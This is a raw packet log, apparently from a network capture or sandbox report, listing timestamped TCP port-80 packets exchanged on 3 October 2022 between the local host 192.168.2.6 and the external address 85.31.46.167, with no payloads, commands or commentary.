Oct 3, 2022 17:42:20.889434099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889451981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889461040 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889467955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889487028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889493942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889504910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889513969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889523983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889540911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889549017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889559031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889575958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889581919 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889594078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889601946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889612913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889630079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889633894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889648914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889667988 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889673948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889688969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889693975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889713049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889723063 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889730930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889745951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889751911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889770031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889777899 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889789104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889806986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889810085 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889825106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889842987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889844894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889859915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889863968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889879942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889895916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889898062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889918089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889926910 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889935970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889952898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889960051 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.889971972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889988899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.889991045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890007973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890017033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890027046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890044928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890048027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890063047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890080929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890090942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890098095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890109062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890116930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890134096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890144110 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890151978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890172958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890177011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890191078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890197992 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890209913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890228033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890234947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890247107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890268087 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890269041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890278101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890290022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890296936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890316010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890326977 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890332937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890351057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890357971 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890368938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890379906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890388012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890405893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890414000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890424013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890440941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890448093 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890465021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890470982 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890471935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890491009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890507936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890510082 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890526056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890539885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890544891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890562057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890563011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890580893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890594959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890599012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890616894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890623093 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890635967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890652895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890659094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890671015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890680075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890688896 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890707016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890712976 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890726089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890742064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890748024 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890759945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890769005 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890789032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890793085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890803099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890805006 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890818119 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890830994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890844107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890856981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890868902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890896082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890914917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890918016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890933990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890939951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890953064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890970945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890976906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.890990019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.890999079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891007900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891026974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891030073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891050100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891066074 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891067028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891086102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891087055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891103983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891122103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891133070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891143084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891155005 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891161919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891179085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891187906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891196012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891212940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891220093 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891232014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891247034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891248941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891267061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891283989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891292095 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891302109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891310930 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891320944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891330004 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891339064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891357899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.891361952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.891398907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.915538073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.915572882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.915617943 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.915668964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918335915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918365002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918381929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918401003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918399096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918418884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918435097 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918437958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918448925 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918457031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918478966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918483019 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918488979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918507099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918524027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918533087 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918540955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918557882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918560028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918584108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918585062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918602943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918617964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918620110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918637991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918648958 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918657064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918680906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918710947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918719053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918739080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918756962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918762922 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918775082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918785095 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918793917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.918806076 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918828011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.918982983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919002056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919018984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919029951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919037104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919063091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919080973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919081926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919110060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919120073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919127941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919146061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919150114 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919164896 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919178963 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919183969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919198990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919199944 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919214964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919233084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919245958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919262886 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919281006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919286966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919301987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919325113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919337034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919343948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919353962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919362068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919375896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919380903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919399977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919400930 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919418097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919430017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919435978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919450045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919455051 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919472933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919481039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919490099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919507027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919512987 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919524908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919542074 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919545889 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919559956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919564962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919578075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919595003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919603109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919614077 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919631004 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919637918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919650078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919655085 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919667959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919692039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919696093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919702053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919708014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.919734955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.919771910 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.180468082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.180551052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.184326887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.185008049 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.211481094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.211491108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.211515903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.211575985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.211648941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.211946011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.211976051 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.211992979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.211992979 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212012053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212025881 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212029934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212049007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212054968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212069988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212080002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212088108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212105989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212105989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212125063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212142944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212160110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212160110 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212172985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212178946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212188959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212198973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212217093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212230921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212239981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212243080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212251902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212258101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212276936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212292910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212299109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212313890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212327003 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212332010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212347984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212351084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212369919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212371111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212388039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212392092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212407112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212409973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212424994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212433100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212444067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212461948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212466955 CEST	49711	80	192.168.2.6	85.31.46.167
